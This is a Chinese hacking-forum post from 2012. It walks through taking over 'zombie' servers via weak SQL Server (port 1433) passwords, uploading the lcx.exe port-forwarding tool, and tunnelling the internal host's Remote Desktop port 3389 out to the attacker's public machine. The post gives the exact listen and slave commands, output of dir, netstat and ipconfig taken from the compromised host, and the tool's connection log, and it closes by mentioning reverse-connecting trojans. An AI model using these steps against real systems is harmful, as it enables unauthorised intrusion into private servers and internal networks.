中国网络渗透测试联盟
标题:
内网渗透中的端口转发
[打印本页]
作者:
admin
时间:
2012-9-23 14:27
标题:
内网渗透中的端口转发
以前抓肉鸡都是通过1433弱口令,然后....
但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。
例:现在有一个ip为 201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir 看一下
C:\>DIR C:\
2004/09/17 10:32 <DIR> autoAK
2005/02/21 17:08 12,541 avgun.log
2005/02/21 17:48 9,347,344 bitdefender_free_win_v72.exe
2006/03/23 09:28 <DIR> CASIO_DATA
2005/02/09 11:09 8,574 CLDMA.LOG
2006/03/25 09:53 <DIR> common
2005/09/29 09:38 12,313 devicetable.log
2005/11/08 15:44 <DIR> DNN
2005/04/14 09:43 468 Documents and Sett
2006/04/02 13:44 <DIR> Documents and Settings
2006/03/22 14:05 <DIR> han
2005/11/02 09:15 <DIR> Inetpub
2006/03/25 09:53 <DIR> Microsoft UAM Volume
2004/08/27 16:46 13,030 PDOXUSRS.NET
2005/02/08 14:16 <DIR> pix
2006/04/02 13:45 <DIR> Program Files
2005/10/10 14:46 <DIR> SD_VIDEO
2006/04/02 13:45 <DIR> WINNT
2005/02/01 13:55 <DIR> WUTemp
netstat -an 查看开放端口
TCP 0.0.0.0:3376 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3791 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3877 0.0.0.0:0 LISTENING
终端已开.看下IP
ipconfig
C:\>ipconfig
Windows 2000 IP Configuration Ethernet adapter
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.24
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
192这样的是内网了...
现在可以用lcx.exe搞定了...
上传lcx.exe到肉鸡...
C:\>dir lcx.exe
C:\WINNT\system32
2006/04/02 13:40 32,768 lcx.exe
首先在自己机子的cmd下运行
lcx.exe -listen 51 3389
意思是监听51端口并转发到3389端口
显示如下:
[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
然后在肉鸡上运行 lcx.exe -slave 你的IP 51 201.1.1.1 3389
201.1.1.1是我举例用的肉鸡IP.换成你的..
运行以后本机监听端口就会收到信息.
[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
[+] Accept a Client on port 55 from 201.1.1.1 ......
[+] Waiting another Client on port:3389....
好了.现在在自己机子上链接 127.0.0.1 或者输你自己IP.
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
优点,搞定内网肉鸡.
缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.
当然也可以用反弹木马控制肉鸡了...
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2